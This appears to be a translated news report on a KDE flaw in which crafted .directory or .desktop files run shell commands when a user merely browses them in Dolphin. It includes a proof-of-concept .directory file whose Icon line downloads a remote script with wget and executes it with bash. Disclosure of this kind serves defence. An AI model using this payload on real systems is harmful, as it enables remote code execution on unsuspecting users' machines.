In KDE , allowing an attacker to execute arbitrary commands when a user browses a directory or archive containing specially crafted ".desktop" and ".directory" files. For an attack, it is enough for the user to simply view the list of files in the Dolphin file manager, upload a malicious desktop file, or drag a shortcut to the desktop or document with the mouse. The problem manifests itself in the current release of libraries and older versions up to KDE 4. Vulnerability is still (CVE not assigned).
The problem is caused by an incorrect implementation of the KDesktopFile class, which, when processing the "Icon" variable without proper escaping, passes the value to the KConfigPrivate::expandString() function, which expands shell special characters, including treating the "$(..)" strings as commands to be executed . Contrary to the requirements of the XDG specification, the execution shell-constructs are made without separating the type of settings, i.e. not only when defining the command line of the application to be launched, but also when specifying icons that are displayed by default.
For example, to attack send the user a zip archive with a directory containing a ".directory" file of the form:
[Desktop Entry]
Type=Directory
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
When you try to view the contents of the archive in the Dolphin file manager, the script https://example.com/FILENAME.sh will be loaded and executed.
Source: opennet.ru